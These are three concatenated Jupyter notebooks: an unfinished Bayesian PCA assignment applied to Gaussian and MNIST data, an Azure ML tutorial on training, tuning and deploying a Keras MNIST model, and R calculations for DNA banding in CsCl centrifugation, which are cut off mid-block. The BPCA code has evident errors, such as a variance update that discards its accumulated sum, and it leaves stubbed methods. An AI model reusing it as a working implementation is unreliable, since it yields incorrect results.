self.b_alpha_tilde = self.b_alpha + np.power(np.linalg.norm(self.means_w,axis=0),2)/2 def __update_tau(self): self.a_tau_tilde = self.a_tau + self.N * self.d/2 self.b_tau_tilda = 0 w = self.means_w ww = w.T.dot(w) mu_mean = self.means_mu for n in range(self.N): z_mean = self.means_z[:,n] x_n = self.X[:, n] self.b_tau_tilda += np.linalg.norm(x_n,ord=2)+mu_mean.T.dot(mu_mean) self.b_tau_tilda += np.trace(ww.dot(z_mean.dot(z_mean.T))) self.b_tau_tilda += 2 * mu_mean.T.dot(w).dot(z_mean) self.b_tau_tilda -=2*x_n.T.dot(w).dot(z_mean) - 2*x_n.T.dot(mu_mean) self.b_tau_tilda = self.b_tau + self.b_tau/2 # returns the squared difference error between reconstructed and the actual data def mse(self): d = self.X - self.transform() return np.linalg.norm(d, ord=2) def transform(self): return self.means_w.dot(self.means_z) + self.means_mu[:,np.newaxis] def L(self, X): L = 0.0 return L def fit(self, X): pass def plot_mse(mse): fig, ax = plt.subplots(figsize=(10, 4)) ax.plot(mse, linewidth=2, marker='s',markersize=5, markerfacecolor='red') ax.grid() ax.set_xlabel('Iteration') ax.set_ylabel('MSE') ``` ### 6. Learning algorithm (10 points) Implement the learning algorithm described in [Bishop99], i.e. iteratively optimize each of the Q-distributions holding the others fixed. What would be a good way to track convergence of the algorithm? Implement your suggestion. Test the algorithm on some test data drawn from a Gaussian with different variances in orthogonal directions. ``` def run_on_gaussian_data(d=2,q=1,N=1000,maxit=10): # generating data C = 10*np.abs(np.random.rand(d,d)) mu = 10*np.abs(np.random.rand(d,1)) X = np.random.multivariate_normal(mu.flatten(), C, size=N) # running BPCA bppca = BayesianPCA(X,q) mse = [bppca.mse()] for i in xrange(maxit): bppca.update() mse.append(bppca.mse()) transformed = bppca.transform() # plotting (works only on 2d data) if d ==2: fig = plt.figure(num=None, figsize=(26, 12), dpi=80, facecolor='w', edgecolor='k') ax1 = fig.add_subplot(311) ax2 = fig.add_subplot(312) ax1.scatter(X[:,0], X[:,1], s=20) ax1.set_title("Original data") ax2.scatter(transformed[:,0], transformed[:,1], s=20) ax2.set_title("Transformed data") plot_mse(mse) plt.show() run_on_gaussian_data(d=100,N=1000,q=30) ``` ### 7. PCA Representation of MNIST (10 points) Download the MNIST dataset from here http://deeplearning.net/tutorial/gettingstarted.html (the page contains python code for loading the data). Run your algorithm on (part of) this dataset, and visualize the results. ``` # plots for MNIST dataset def plot_bppca_digits(X, q=700, maxit=7): # initial plot fig0, ax0 = plt.subplots(nrows=2, ncols=5, figsize=[15, 10]) ax0 = ax0.flatten() for i in xrange(10): ax0[i].matshow(X[i].reshape(28,28), cmap=plt_cm.gray) fig0.suptitle('Initial images', fontsize=20) np.random.seed(0) bppca = BayesianPCA(X,q) mse = [bppca.mse()] for i in xrange(maxit): print("iteration "+str(i+1)) bppca.update() mse.append(bppca.mse()) # transformed image transformed = bppca.transform() fig1, ax1 = plt.subplots(nrows=2, ncols=5, figsize=[15, 10]) ax1 = ax1.flatten() for i in xrange(10): ax1[i].matshow(transformed[i].reshape(28,28), cmap=plt_cm.gray) fig1.suptitle('Reconstructed images with q = '+str(q), fontsize=20) plot_mse(mse) plt.show() return bppca # loading digits f = gzip.open('mnist.pkl.gz') train_set, valid_set, test_set = cPickle.load(f) f.close() plot_bppca_digits(test_set[0][0:15],q=600) ```
github_jupyter
Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. ![Impressions](https://PixelServer20190423114238.azurewebsites.net/api/impressions/MachineLearningNotebooks/how-to-use-azureml/training-with-deep-learning/train-hyperparameter-tune-deploy-with-keras/train-hyperparameter-tune-deploy-with-keras.png) # Training, hyperparameter tune, and deploy with Keras ## Introduction This tutorial shows how to train a simple deep neural network using the MNIST dataset and Keras on Azure Machine Learning. MNIST is a popular dataset consisting of 70,000 grayscale images. Each image is a handwritten digit of `28x28` pixels, representing number from 0 to 9. The goal is to create a multi-class classifier to identify the digit each image represents, and deploy it as a web service in Azure. For more information about the MNIST dataset, please visit [Yan LeCun's website](http://yann.lecun.com/exdb/mnist/). ## Prerequisite: * Understand the [architecture and terms](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture) introduced by Azure Machine Learning * If you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, go through the [configuration notebook](../../../configuration.ipynb) to: * install the AML SDK * create a workspace and its configuration file (`config.json`) * For local scoring test, you will also need to have `tensorflow` and `keras` installed in the current Jupyter kernel. Let's get started. First let's import some Python libraries. ``` %matplotlib inline import numpy as np import os import matplotlib.pyplot as plt import azureml from azureml.core import Workspace # check core SDK version number print("Azure ML SDK Version: ", azureml.core.VERSION) ``` ## Initialize workspace Initialize a [Workspace](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture#workspace) object from the existing workspace you created in the Prerequisites step. `Workspace.from_config()` creates a workspace object from the details stored in `config.json`. ``` ws = Workspace.from_config() print('Workspace name: ' + ws.name, 'Azure region: ' + ws.location, 'Subscription id: ' + ws.subscription_id, 'Resource group: ' + ws.resource_group, sep='\n') ``` ## Create an Azure ML experiment Let's create an experiment named "keras-mnist" and a folder to hold the training scripts. The script runs will be recorded under the experiment in Azure. ``` from azureml.core import Experiment script_folder = './keras-mnist' os.makedirs(script_folder, exist_ok=True) exp = Experiment(workspace=ws, name='keras-mnist') ``` ## Explore data Before you train a model, you need to understand the data that you are using to train it. In this section you learn how to: * Download the MNIST dataset * Display some sample images ### Download the MNIST dataset Download the MNIST dataset and save the files into a `data` directory locally. Images and labels for both training and testing are downloaded. ``` import urllib.request data_folder = os.path.join(os.getcwd(), 'data') os.makedirs(data_folder, exist_ok=True) urllib.request.urlretrieve('http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz', filename=os.path.join(data_folder, 'train-images.gz')) urllib.request.urlretrieve('http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz', filename=os.path.join(data_folder, 'train-labels.gz')) urllib.request.urlretrieve('http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz', filename=os.path.join(data_folder, 'test-images.gz')) urllib.request.urlretrieve('http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz', filename=os.path.join(data_folder, 'test-labels.gz')) ``` ### Display some sample images Load the compressed files into `numpy` arrays. Then use `matplotlib` to plot 30 random images from the dataset with their labels above them. Note this step requires a `load_data` function that's included in an `utils.py` file. This file is included in the sample folder. Please make sure it is placed in the same folder as this notebook. The `load_data` function simply parses the compressed files into numpy arrays. ``` # make sure utils.py is in the same directory as this code from utils import load_data, one_hot_encode # note we also shrink the intensity values (X) from 0-255 to 0-1. This helps the model converge faster. X_train = load_data(os.path.join(data_folder, 'train-images.gz'), False) / 255.0 X_test = load_data(os.path.join(data_folder, 'test-images.gz'), False) / 255.0 y_train = load_data(os.path.join(data_folder, 'train-labels.gz'), True).reshape(-1) y_test = load_data(os.path.join(data_folder, 'test-labels.gz'), True).reshape(-1) # now let's show some randomly chosen images from the training set. count = 0 sample_size = 30 plt.figure(figsize = (16, 6)) for i in np.random.permutation(X_train.shape[0])[:sample_size]: count = count + 1 plt.subplot(1, sample_size, count) plt.axhline('') plt.axvline('') plt.text(x=10, y=-10, s=y_train[i], fontsize=18) plt.imshow(X_train[i].reshape(28, 28), cmap=plt.cm.Greys) plt.show() ``` Now you have an idea of what these images look like and the expected prediction outcome. ## Create a FileDataset A FileDataset references one or multiple files in your datastores or public urls. The files can be of any format. FileDataset provides you with the ability to download or mount the files to your compute. By creating a dataset, you create a reference to the data source location. If you applied any subsetting transformations to the dataset, they will be stored in the dataset as well. The data remains in its existing location, so no extra storage cost is incurred. [Learn More](https://aka.ms/azureml/howto/createdatasets) ``` from azureml.core.dataset import Dataset web_paths = [ 'http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz', 'http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz', 'http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz', 'http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz' ] dataset = Dataset.File.from_files(path = web_paths) ``` Use the `register()` method to register datasets to your workspace so they can be shared with others, reused across various experiments, and referred to by name in your training script. ``` dataset = dataset.register(workspace = ws, name = 'mnist dataset', description='training and test dataset', create_new_version=True) ``` ## Create or Attach existing AmlCompute You will need to create a [compute target](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture#compute-target) for training your model. In this tutorial, you create `AmlCompute` as your training compute resource. If we could not find the cluster with the given name, then we will create a new cluster here. We will create an `AmlCompute` cluster of `STANDARD_NC6` GPU VMs. This process is broken down into 3 steps: 1. create the configuration (this step is local and only takes a second) 2. create the cluster (this step will take about **20 seconds**) 3. provision the VMs to bring the cluster to the initial size (of 1 in this case). This step will take about **3-5 minutes** and is providing only sparse output in the process. Please make sure to wait until the call returns before moving to the next cell ``` from azureml.core.compute import ComputeTarget, AmlCompute from azureml.core.compute_target import ComputeTargetException # choose a name for your cluster cluster_name = "gpu-cluster" try: compute_target = ComputeTarget(workspace=ws, name=cluster_name) print('Found existing compute target') except ComputeTargetException: print('Creating a new compute target...') compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_NC6', max_nodes=4) # create the cluster compute_target = ComputeTarget.create(ws, cluster_name, compute_config) # can poll for a minimum number of nodes and for a specific timeout. # if no min node count is provided it uses the scale settings for the cluster compute_target.wait_for_completion(show_output=True, min_node_count=None, timeout_in_minutes=20) # use get_status() to get a detailed status for the current cluster. print(compute_target.get_status().serialize()) ``` Now that you have created the compute target, let's see what the workspace's `compute_targets` property returns. You should now see one entry named "gpu-cluster" of type `AmlCompute`. ``` compute_targets = ws.compute_targets for name, ct in compute_targets.items(): print(name, ct.type, ct.provisioning_state) ``` ## Copy the training files into the script folder The Keras training script is already created for you. You can simply copy it into the script folder, together with the utility library used to load compressed data file into numpy array. ``` import shutil # the training logic is in the keras_mnist.py file. shutil.copy('./keras_mnist.py', script_folder) # the utils.py just helps loading data from the downloaded MNIST dataset into numpy arrays. shutil.copy('./utils.py', script_folder) ``` ## Construct neural network in Keras In the training script `keras_mnist.py`, it creates a very simple DNN (deep neural network), with just 2 hidden layers. The input layer has 28 * 28 = 784 neurons, each representing a pixel in an image. The first hidden layer has 300 neurons, and the second hidden layer has 100 neurons. The output layer has 10 neurons, each representing a targeted label from 0 to 9. ![DNN](nn.png) ### Azure ML concepts Please note the following three things in the code below: 1. The script accepts arguments using the argparse package. In this case there is one argument `--data_folder` which specifies the FileDataset in which the script can find the MNIST data ``` parser = argparse.ArgumentParser() parser.add_argument('--data_folder') ``` 2. The script is accessing the Azure ML `Run` object by executing `run = Run.get_context()`. Further down the script is using the `run` to report the loss and accuracy at the end of each epoch via callback. ``` run.log('Loss', log['loss']) run.log('Accuracy', log['acc']) ``` 3. When running the script on Azure ML, you can write files out to a folder `./outputs` that is relative to the root directory. This folder is specially tracked by Azure ML in the sense that any files written to that folder during script execution on the remote target will be picked up by Run History; these files (known as artifacts) will be available as part of the run history record. The next cell will print out the training code for you to inspect. ``` with open(os.path.join(script_folder, './keras_mnist.py'), 'r') as f: print(f.read()) ``` ## Create TensorFlow estimator & add Keras Next, we construct an `azureml.train.dnn.TensorFlow` estimator object, use the `gpu-cluster` as compute target, and pass the mount-point of the datastore to the training code as a parameter. The TensorFlow estimator is providing a simple way of launching a TensorFlow training job on a compute target. It will automatically provide a docker image that has TensorFlow installed. In this case, we add `keras` package (for the Keras framework obviously), and `matplotlib` package for plotting a "Loss vs. Accuracy" chart and record it in run history. ``` dataset = Dataset.get_by_name(ws, 'mnist dataset') # list the files referenced by mnist dataset dataset.to_path() from azureml.train.dnn import TensorFlow script_params = { '--data-folder': dataset.as_named_input('mnist').as_mount(), '--batch-size': 50, '--first-layer-neurons': 300, '--second-layer-neurons': 100, '--learning-rate': 0.001 } est = TensorFlow(source_directory=script_folder, script_params=script_params, compute_target=compute_target, entry_script='keras_mnist.py', pip_packages=['keras==2.2.5','azureml-dataprep[pandas,fuse]','matplotlib']) ``` ## Submit job to run Submit the estimator to the Azure ML experiment to kick off the execution. ``` run = exp.submit(est) ``` ### Monitor the Run As the Run is executed, it will go through the following stages: 1. Preparing: A docker image is created matching the Python environment specified by the TensorFlow estimator and it will be uploaded to the workspace's Azure Container Registry. This step will only happen once for each Python environment -- the container will then be cached for subsequent runs. Creating and uploading the image takes about **5 minutes**. While the job is preparing, logs are streamed to the run history and can be viewed to monitor the progress of the image creation. 2. Scaling: If the compute needs to be scaled up (i.e. the AmlCompute cluster requires more nodes to execute the run than currently available), the cluster will attempt to scale up in order to make the required amount of nodes available. Scaling typically takes about **5 minutes**. 3. Running: All scripts in the script folder are uploaded to the compute target, data stores are mounted/copied and the `entry_script` is executed. While the job is running, stdout and the `./logs` folder are streamed to the run history and can be viewed to monitor the progress of the run. 4. Post-Processing: The `./outputs` folder of the run is copied over to the run history There are multiple ways to check the progress of a running job. We can use a Jupyter notebook widget. **Note: The widget will automatically update ever 10-15 seconds, always showing you the most up-to-date information about the run** ``` from azureml.widgets import RunDetails RunDetails(run).show() ``` We can also periodically check the status of the run object, and navigate to Azure portal to monitor the run. ``` run run.wait_for_completion(show_output=True) ``` In the outputs of the training script, it prints out the Keras version number. Please make a note of it. ### The Run object The Run object provides the interface to the run history -- both to the job and to the control plane (this notebook), and both while the job is running and after it has completed. It provides a number of interesting features for instance: * `run.get_details()`: Provides a rich set of properties of the run * `run.get_metrics()`: Provides a dictionary with all the metrics that were reported for the Run * `run.get_file_names()`: List all the files that were uploaded to the run history for this Run. This will include the `outputs` and `logs` folder, azureml-logs and other logs, as well as files that were explicitly uploaded to the run using `run.upload_file()` Below are some examples -- please run through them and inspect their output. ``` run.get_details() run.get_metrics() run.get_file_names() ``` ## Download the saved model In the training script, the Keras model is saved into two files, `model.json` and `model.h5`, in the `outputs/models` folder on the gpu-cluster AmlCompute node. Azure ML automatically uploaded anything written in the `./outputs` folder into run history file store. Subsequently, we can use the `run` object to download the model files. They are under the the `outputs/model` folder in the run history file store, and are downloaded into a local folder named `model`. ``` # create a model folder in the current directory os.makedirs('./model', exist_ok=True) for f in run.get_file_names(): if f.startswith('outputs/model'): output_file_path = os.path.join('./model', f.split('/')[-1]) print('Downloading from {} to {} ...'.format(f, output_file_path)) run.download_file(name=f, output_file_path=output_file_path) ``` ## Predict on the test set Let's check the version of the local Keras. Make sure it matches with the version number printed out in the training script. Otherwise you might not be able to load the model properly. ``` import keras import tensorflow as tf print("Keras version:", keras.__version__) print("Tensorflow version:", tf.__version__) ``` Now let's load the downloaded model. ``` from keras.models import model_from_json # load json and create model json_file = open('model/model.json', 'r') loaded_model_json = json_file.read() json_file.close() loaded_model = model_from_json(loaded_model_json) # load weights into new model loaded_model.load_weights("model/model.h5") print("Model loaded from disk.") ``` Feed test dataset to the persisted model to get predictions. ``` # evaluate loaded model on test data loaded_model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy']) y_test_ohe = one_hot_encode(y_test, 10) y_hat = np.argmax(loaded_model.predict(X_test), axis=1) # print the first 30 labels and predictions print('labels: \t', y_test[:30]) print('predictions:\t', y_hat[:30]) ``` Calculate the overall accuracy by comparing the predicted value against the test set. ``` print("Accuracy on the test set:", np.average(y_hat == y_test)) ``` ## Intelligent hyperparameter tuning We have trained the model with one set of hyperparameters, now let's how we can do hyperparameter tuning by launching multiple runs on the cluster. First let's define the parameter space using random sampling. ``` from azureml.train.hyperdrive import RandomParameterSampling, BanditPolicy, HyperDriveConfig, PrimaryMetricGoal from azureml.train.hyperdrive import choice, loguniform ps = RandomParameterSampling( { '--batch-size': choice(25, 50, 100), '--first-layer-neurons': choice(10, 50, 200, 300, 500), '--second-layer-neurons': choice(10, 50, 200, 500), '--learning-rate': loguniform(-6, -1) } ) ``` Next, we will create a new estimator without the above parameters since they will be passed in later by Hyperdrive configuration. Note we still need to keep the `data-folder` parameter since that's not a hyperparamter we will sweep. ``` est = TensorFlow(source_directory=script_folder, script_params={'--data-folder': dataset.as_named_input('mnist').as_mount()}, compute_target=compute_target, entry_script='keras_mnist.py', pip_packages=['keras==2.2.5','azureml-dataprep[pandas,fuse]','matplotlib']) ``` Now we will define an early termnination policy. The `BanditPolicy` basically states to check the job every 2 iterations. If the primary metric (defined later) falls outside of the top 10% range, Azure ML terminate the job. This saves us from continuing to explore hyperparameters that don't show promise of helping reach our target metric. ``` policy = BanditPolicy(evaluation_interval=2, slack_factor=0.1) ``` Now we are ready to configure a run configuration object, and specify the primary metric `Accuracy` that's recorded in your training runs. If you go back to visit the training script, you will notice that this value is being logged after every epoch (a full batch set). We also want to tell the service that we are looking to maximizing this value. We also set the number of samples to 20, and maximal concurrent job to 4, which is the same as the number of nodes in our computer cluster. ``` hdc = HyperDriveConfig(estimator=est, hyperparameter_sampling=ps, policy=policy, primary_metric_name='Accuracy', primary_metric_goal=PrimaryMetricGoal.MAXIMIZE, max_total_runs=20, max_concurrent_runs=4) ``` Finally, let's launch the hyperparameter tuning job. ``` hdr = exp.submit(config=hdc) ``` We can use a run history widget to show the progress. Be patient as this might take a while to complete. ``` RunDetails(hdr).show() hdr.wait_for_completion(show_output=True) ``` ### Warm start a Hyperparameter Tuning experiment and resuming child runs Often times, finding the best hyperparameter values for your model can be an iterative process, needing multiple tuning runs that learn from previous hyperparameter tuning runs. Reusing knowledge from these previous runs will accelerate the hyperparameter tuning process, thereby reducing the cost of tuning the model and will potentially improve the primary metric of the resulting model. When warm starting a hyperparameter tuning experiment with Bayesian sampling, trials from the previous run will be used as prior knowledge to intelligently pick new samples, so as to improve the primary metric. Additionally, when using Random or Grid sampling, any early termination decisions will leverage metrics from the previous runs to determine poorly performing training runs. Azure Machine Learning allows you to warm start your hyperparameter tuning run by leveraging knowledge from up to 5 previously completed hyperparameter tuning parent runs. Additionally, there might be occasions when individual training runs of a hyperparameter tuning experiment are cancelled due to budget constraints or fail due to other reasons. It is now possible to resume such individual training runs from the last checkpoint (assuming your training script handles checkpoints). Resuming an individual training run will use the same hyperparameter configuration and mount the storage used for that run. The training script should accept the "--resume-from" argument, which contains the checkpoint or model files from which to resume the training run. You can also resume individual runs as part of an experiment that spends additional budget on hyperparameter tuning. Any additional budget, after resuming the specified training runs is used for exploring additional configurations. For more information on warm starting and resuming hyperparameter tuning runs, please refer to the [Hyperparameter Tuning for Azure Machine Learning documentation](https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-tune-hyperparameters) ## Find and register best model When all the jobs finish, we can find out the one that has the highest accuracy. ``` best_run = hdr.get_best_run_by_primary_metric() print(best_run.get_details()['runDefinition']['arguments']) ``` Now let's list the model files uploaded during the run. ``` print(best_run.get_file_names()) ``` We can then register the folder (and all files in it) as a model named `keras-dnn-mnist` under the workspace for deployment. ``` model = best_run.register_model(model_name='keras-mlp-mnist', model_path='outputs/model') ``` ## Deploy the model in ACI Now we are ready to deploy the model as a web service running in Azure Container Instance [ACI](https://azure.microsoft.com/en-us/services/container-instances/). Azure Machine Learning accomplishes this by constructing a Docker image with the scoring logic and model baked in. ### Create score.py First, we will create a scoring script that will be invoked by the web service call. * Note that the scoring script must have two required functions, `init()` and `run(input_data)`. * In `init()` function, you typically load the model into a global object. This function is executed only once when the Docker container is started. * In `run(input_data)` function, the model is used to predict a value based on the input data. The input and output to `run` typically use JSON as serialization and de-serialization format but you are not limited to that. ``` %%writefile score.py import json import numpy as np import os from keras.models import model_from_json from azureml.core.model import Model def init(): global model model_root = Model.get_model_path('keras-mlp-mnist') # load json and create model json_file = open(os.path.join(model_root, 'model.json'), 'r') model_json = json_file.read() json_file.close() model = model_from_json(model_json) # load weights into new model model.load_weights(os.path.join(model_root, "model.h5")) model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy']) def run(raw_data): data = np.array(json.loads(raw_data)['data']) # make prediction y_hat = np.argmax(model.predict(data), axis=1) return y_hat.tolist() ``` ### Create myenv.yml We also need to create an environment file so that Azure Machine Learning can install the necessary packages in the Docker image which are required by your scoring script. In this case, we need to specify conda packages `tensorflow` and `keras`. ``` from azureml.core.conda_dependencies import CondaDependencies cd = CondaDependencies.create() cd.add_tensorflow_conda_package() cd.add_conda_package('keras==2.2.5') cd.save_to_file(base_directory='./', conda_file_path='myenv.yml') print(cd.serialize_to_string()) ``` ### Deploy to ACI We are almost ready to deploy. Create the inference configuration and deployment configuration and deploy to ACI. This cell will run for about 7-8 minutes. ``` from azureml.core.webservice import AciWebservice from azureml.core.model import InferenceConfig from azureml.core.model import Model inference_config = InferenceConfig(runtime= "python", entry_script="score.py", conda_file="myenv.yml") aciconfig = AciWebservice.deploy_configuration(cpu_cores=1, auth_enabled=True, # this flag generates API keys to secure access memory_gb=1, tags={'name': 'mnist', 'framework': 'Keras'}, description='Keras MLP on MNIST') service = Model.deploy(workspace=ws, name='keras-mnist-svc', models=[model], inference_config=inference_config, deployment_config=aciconfig) service.wait_for_deployment(True) print(service.state) ``` **Tip: If something goes wrong with the deployment, the first thing to look at is the logs from the service by running the following command:** `print(service.get_logs())` This is the scoring web service endpoint: ``` print(service.scoring_uri) ``` ### Test the deployed model Let's test the deployed model. Pick 30 random samples from the test set, and send it to the web service hosted in ACI. Note here we are using the `run` API in the SDK to invoke the service. You can also make raw HTTP calls using any HTTP tool such as curl. After the invocation, we print the returned predictions and plot them along with the input images. Use red font color and inversed image (white on black) to highlight the misclassified samples. Note since the model accuracy is pretty high, you might have to run the below cell a few times before you can see a misclassified sample. ``` import json # find 30 random samples from test set n = 30 sample_indices = np.random.permutation(X_test.shape[0])[0:n] test_samples = json.dumps({"data": X_test[sample_indices].tolist()}) test_samples = bytes(test_samples, encoding='utf8') # predict using the deployed model result = service.run(input_data=test_samples) # compare actual value vs. the predicted values: i = 0 plt.figure(figsize = (20, 1)) for s in sample_indices: plt.subplot(1, n, i + 1) plt.axhline('') plt.axvline('') # use different color for misclassified sample font_color = 'red' if y_test[s] != result[i] else 'black' clr_map = plt.cm.gray if y_test[s] != result[i] else plt.cm.Greys plt.text(x=10, y=-10, s=y_test[s], fontsize=18, color=font_color) plt.imshow(X_test[s].reshape(28, 28), cmap=clr_map) i = i + 1 plt.show() ``` We can retrieve the API keys used for accessing the HTTP endpoint. ``` # Retrieve the API keys. Two keys were generated. key1, Key2 = service.get_keys() print(key1) ``` We can now send construct raw HTTP request and send to the service. Don't forget to add key to the HTTP header. ``` import requests # send a random row from the test set to score random_index = np.random.randint(0, len(X_test)-1) input_data = "{\"data\": [" + str(list(X_test[random_index])) + "]}" headers = {'Content-Type':'application/json', 'Authorization': 'Bearer ' + key1} resp = requests.post(service.scoring_uri, input_data, headers=headers) print("POST to url", service.scoring_uri) #print("input data:", input_data) print("label:", y_test[random_index]) print("prediction:", resp.text) ``` Let's look at the workspace after the web service was deployed. You should see * a registered model named 'keras-mlp-mnist' and with the id 'model:1' * a webservice called 'keras-mnist-svc' with some scoring URL ``` models = ws.models for name, model in models.items(): print("Model: {}, ID: {}".format(name, model.id)) webservices = ws.webservices for name, webservice in webservices.items(): print("Webservice: {}, scoring URI: {}".format(name, webservice.scoring_uri)) ``` ## Clean up You can delete the ACI deployment with a simple delete API call. ``` service.delete() ```
github_jupyter
# Description * Determining how differences in our isopycnic cfg conditions vary in meaningful ways from those of Clay et al., 2003. Eur Biophys J * Needed to determine whether the Clay et al., 2003 function describing diffusion is applicable to our data > standard conditions from: Clay et al., 2003. Eur Biophys J * Standard conditions: * 44k rev/min for Beckman XL-A * An-50 Ti Rotor * 44.77k rev/min for Beckman model E * 35k rev/min for preparative ultra-cfg & fractionation * De Sario et al., 1995: vertical rotor: VTi90 (Beckman) * 35k rpm for 16.5 h * Our conditions: * speed (R) = 55k rev/min * radius top/bottom (cm) = 2.6, 4.85 * angular velocity: w = `((2 * 3.14159 * R)/60)^2` * TLA110 rotor ``` import numpy as np %load_ext rpy2.ipython %%R library(ggplot2) library(dplyr) ``` ### Beckman XL-A ### Beckman model E # Angular velocity (omega) ``` # angular velocity: our setup angular_vel_f = lambda R: (2 * 3.14159 * R / 60) print angular_vel_f(55000) # angular velocity: De Sario et al., 1995 print angular_vel_f(35000) ``` # Meselson et al., 1957 equation on s.d. of band due to diffusion \begin{equation} \sigma^2 = \frac{RT}{M_{PX_n}\bar{\upsilon}_{PX_n} (\frac{dp}{dr})_{r_0} \omega^2 r_0} \end{equation} * R = gas constant * T = temperature (C) * M = molecular weight * PX_n = macromolecular electrolyte * v = partial specific volume (mL/g) * w = angular velocity * r_0 = distance between the band center and rotor center * dp/dr = density gradient # Time to equilibrium: vertical rotor radius_max - radius_min = width_of_tube * VTi90 Rotor * radius_max = 71.1 mm * radius_min = 57.9 mm ``` %%R -w 14 -h 6 -u in library(ggplot2) library(reshape) library(grid) # radius top,bottom (cm) r.top = 57.9 / 10 r.bottom = 71.1 / 10 # isoconcentration point I = sqrt((r.top^2 + r.top * r.bottom + r.bottom^2)/3) # rpm R = 35000 # particle density D = 1.70 # beta^o B = 1.14e9 # dna in bp from 0.1kb - 100kb L = seq(100, 100000, 100) # angular velocity ## 2*pi*rpm / 60 w = ((2 * 3.14159 * R)/60)^2 # DNA GC content G.C = seq(0.1, 0.9, 0.05) # Molecular weight # M.W in relation to GC content (dsDNA) A = 313.2 T = 304.2 C = 289.2 G = 329.2 GC = G + C AT = A + T #GC2MW = function(x){ x*GC + (1-x)*AT + 157 } # assuming 5' monophosphate on end of molecules GC2MW = function(x){ x*GC + (1-x)*AT } M.W = sapply(G.C, GC2MW) # buoyant density ## GC_fraction = (p - 1.66) / 0.098 GC2buoyant.density = function(x){ (x * 0.098) + 1.66 } B.D = GC2buoyant.density(G.C) # radius of the isoconcentration point from cfg center (AKA: r.p) ## position of the particle at equilibrium buoyant.density2radius = function(x){ sqrt( ((x-D)*2*B/w) + I^2 ) } P = buoyant.density2radius(B.D) # calculating S S.fun = function(L){ 2.8 + (0.00834 * (L*M.W)^0.479) } S = t(sapply( L, S.fun )) # calculating T T = matrix(ncol=17, nrow=length(L)) for(i in 1:ncol(S)){ T[,i] = 1.13e14 * B * (D-1) / (R^4 * P[i]^2 * S[,i]) } ## formating T = as.data.frame(T) colnames(T) = G.C T$dna_size__kb = L / 1000 T.m = melt(T, id.vars=c('dna_size__kb')) colnames(T.m) = c('dna_size__kb', 'GC_content', 'time__h') #T.m$GC_content = as.numeric(as.character(T.m$GC_content)) ## plotting p = ggplot(T.m, aes(dna_size__kb, time__h, color=GC_content, group=GC_content)) + geom_line() + scale_y_continuous(limits=c(0,175)) + labs(x='DNA length (kb)', y='Time (hr)') + scale_color_discrete(name='GC content') + #geom_hline(yintercept=66, linetype='dashed', alpha=0.5) + theme( text = element_text(size=18) ) #print(p) # plotting at small scale p.sub = ggplot(T.m, aes(dna_size__kb, time__h, color=GC_content, group=GC_content)) + geom_line() + scale_x_continuous(limits=c(0,5)) + scale_y_continuous(limits=c(0,175)) + labs(x='DNA length (kb)', y='Time (hr)') + scale_color_discrete(name='GC content') + #geom_hline(yintercept=66, linetype='dashed', alpha=0.5) + theme( text = element_text(size=14), legend.position = 'none' ) vp = viewport(width=0.43, height=0.52, x = 0.65, y = 0.68) print(p) print(p.sub, vp=vp) ``` # Plotting band s.d. as defined the ultra-cfg technical manual ### density gradient \begin{equation} \frac{d\rho}{dr} = \frac{\omega^2r}{\beta} \end{equation} ### band standard deviation \begin{equation} \sigma^2 = \frac{\theta}{M_{app}}\frac{RT}{(\frac{d\rho}{dr})_{eff} \omega^2r_o} \end{equation} ### combined \begin{equation} \sigma^2 = \frac{\theta}{M_{app}}\frac{RT}{\frac{\omega^4r_o^2}{\beta}} \end{equation} ### buoyant density of a molecule \begin{equation} \theta = \rho_i + \frac{\omega^2}{2\beta}(r_o^2 - r_1^2) \end{equation} ### standard deviation due to diffusion (Clay et al., 2003) \begin{equation} \sigma_{diffusion}^2 = \Big(\frac{100%}{0.098}\Big)^2 \frac{\rho RT}{\beta_B^2GM_{Cs}} \frac{1}{1000l} \end{equation} ``` %%R # gas constant R = 8.3144621e7 #J / mol*K # temp T = 273.15 + 23 # 23oC # rotor speed (rpm) S = 55000 # beta^o beta = 1.14 * 10^-9 #beta = 1.195 * 10^-10 # G G = 7.87 * 10^10 #cgs # angular velocity ## 2*pi*rpm / 60 omega = 2 * pi * S /60 # GC GC = seq(0,1,0.1) # lengths lens = seq(1000, 100000, 10000) # molecular weight GC2MW.dry = function(x){ A = 313.2 T = 304.2 C = 289.2 G = 329.2 GC = G + C AT = A + T x*GC + (1-x)*AT } M.dry = sapply(GC, GC2MW) GC2MW.dryCS = function(n){ #n = number of bases #base pair = 665 daltons #base pair per dry cesium DNA = 665 * 4/3 ~= 882 return(n * 882) } M.dryCS = sapply(lens, GC2MW.dryCS) # BD GC2BD = function(x){ (x * 0.098) + 1.66 } rho = sapply(GC, GC2BD) # sd calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){ R = 8.3145e7 x = (100 / 0.098)^2 * ((p*R*T)/(B^2*G*L*M)) return(x) } # run p=seq(1.7, 1.75, 0.01) L=seq(1000, 50000, 1000) m = outer(p, L, calc_s.d) rownames(m) = p colnames(m) = L %%R # gas constant R = 8.3144621e7 #J / mol*K # temp T = 273.15 + 23 # 23oC # rotor speed (rpm) S = 55000 # beta^o beta = 1.14 * 10^-9 #beta = 1.195 * 10^-10 # G G = 7.87 * 10^10 #cgs # angular velocity ## 2*pi*rpm / 60 omega = 2 * pi * S /60 # GC GC = seq(0,1,0.1) # lengths lens = seq(1000, 100000, 10000) # molecular weight GC2MW.dry = function(x){ A = 313.2 T = 304.2 C = 289.2 G = 329.2 GC = G + C AT = A + T x*GC + (1-x)*AT 